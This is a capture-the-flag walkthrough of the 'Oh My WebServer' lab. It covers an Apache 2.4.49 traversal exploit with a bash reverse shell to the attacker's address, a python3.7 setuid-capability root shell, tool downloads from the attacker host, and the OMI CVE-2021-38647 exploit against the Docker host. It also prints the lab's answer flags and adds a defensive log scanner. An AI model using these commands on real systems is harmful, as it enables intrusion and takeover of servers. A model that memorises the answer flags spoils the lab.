# Oh My WebServer

Can you root me?

## Scanning

Scan the target:

```
nmap -A -T4 10.10.178.132
```

## HTTP

Check the webpage served on port 80.

## Enumeration

Brute-force the directory tree:

```
gobuster dir -u http://10.10.178.132/ -w /usr/share/wordlists/dirb/common.txt -t 30
```

There is an `/assets` directory that lists every file.

A `/cgi-bin` directory is also present, and it can be used to reach any of those assets.

## Exploitation

Look for a known exploit for the Apache version reported by the scan:

```
searchsploit apache 2.4.49
```

Mirror the exploit script and write the target URL into a file:

```
searchsploit -m 50383.sh
echo http://10.10.178.132 > target.txt
```

The script takes that target file as its first argument.

Use it to get a reverse shell, with a listener waiting on port 4444:

```
./50383.sh target.txt /bin/bash "bash -i >& /dev/tcp/10.18.37.45/4444 0>&1"
nc -vlnp 4444
```
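A detection-side counterpart to the step above, added here and not part of the original writeup: a small Python scanner over Apache access-log lines (constructed samples embedded inline) that percent-decodes each request path and flags any that resolves to a `..` segment, which is how the Apache 2.4.49 traversal used by 50383.sh (CVE-2021-41773) shows up in logs. The log format (Apache common log) and the sample client address are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache common log format. Lines 2 and 3 imitate the
# encoded dot segments (".%2e") the Apache 2.4.49 traversal relies on: the server's
# path normalisation misses them, so /cgi-bin/ becomes a way out of DocumentRoot.
SAMPLE_LOG = """\
10.18.37.45 - - [01/Jan/2024:10:00:00 +0000] "GET /assets/ HTTP/1.1" 200 512
10.18.37.45 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1450
10.18.37.45 - - [01/Jan/2024:10:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 89
10.18.37.45 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded dots (%252e) are seen too."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(path: str) -> bool:
    """True if any path segment decodes to '..', i.e. the request tries to leave
    the mapped directory. The query string is dropped; only the path is mapped."""
    decoded = fully_decode(path.split("?", 1)[0])
    return any(seg == ".." for seg in decoded.split("/"))

def find_traversal_requests(log_text: str) -> list:
    """One dict per flagged request; the status code lets a responder separate a
    blocked attempt (4xx) from one the server actually served (200)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m.group("path")):
            hits.append({
                "client": m.group("client"),
                "method": m.group("method"),
                "path": m.group("path"),
                "decoded": fully_decode(m.group("path")),
                "status": int(m.group("status")),
            })
    return hits

if __name__ == "__main__":
    for h in find_traversal_requests(SAMPLE_LOG):
        print(f"{h['client']} {h['method']} {h['decoded']} [{h['status']}]")
```

A hit with status 200 means the server actually mapped the traversed path; on a patched build (2.4.51 or later) the same request should be rejected with a 4xx.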

It seems we are inside a Docker container.

There is no flag inside the container, so check for file capabilities:

```
getcap -r / 2>/dev/null
```

Leverage it: `python3.7` carries the setuid capability, so it can switch to uid 0 and spawn a root shell inside the container:

```
python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

Our flag is in the root folder of the container.

Flag user.txt
Answer THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

## Privilege Escalation

Now we need to escalate to the real machine, not the Docker container.

Guess that the host is 172.17.0.1, since we are on 172.17.0.2 (the first address on the default Docker bridge is the host's gateway).

The container has no nmap, so bring a static binary across.

On the attacker machine:

```
# fetch the raw binary: the blob/ URL returns the GitHub HTML page, not the file
wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/nmap
python3 -m http.server
```

On the target machine:

```
curl http://10.18.37.45:8000/nmap -o nmap
chmod 777 nmap
```

Now we can use nmap against the host:

```
./nmap 172.17.0.1 -p- --min-rate 5000
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Host is up (0.00042s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
```

Searching for an exploit for the service on port 5986, I found CVE-2021-38647 (the unauthenticated remote code execution bug in Open Management Infrastructure, OMI).

Clone the exploit on the attacker machine and serve it:

```
git clone https://github.com/AlteredSecurity/CVE-2021-38647
cd CVE-2021-38647
python3 -m http.server
```

On the target machine:

```
curl http://10.18.37.45:8000/CVE-2021-38647.py -o CVE-2021-38647.py
curl http://10.18.37.45:8000/Invoke-CVE-2021-38647.ps1 -o Invoke-CVE-2021-38647.ps1
```

Now run the exploit against the host, checking first that commands execute:

```
python3 CVE-2021-38647.py -t 172.17.0.1 -c 'id'
python3 CVE-2021-38647.py -t 172.17.0.1 -c 'hostname'
python3 CVE-2021-38647.py -t 172.17.0.1 -c 'uname -a'
```

We now have command execution on the actual host, so read the root flag:

```
python3 CVE-2021-38647.py -t 172.17.0.1 -c 'cat /root/root.txt'
```

Flag root.txt
Answer THM{7f147ef1f36da9ae29529890a1b6011f}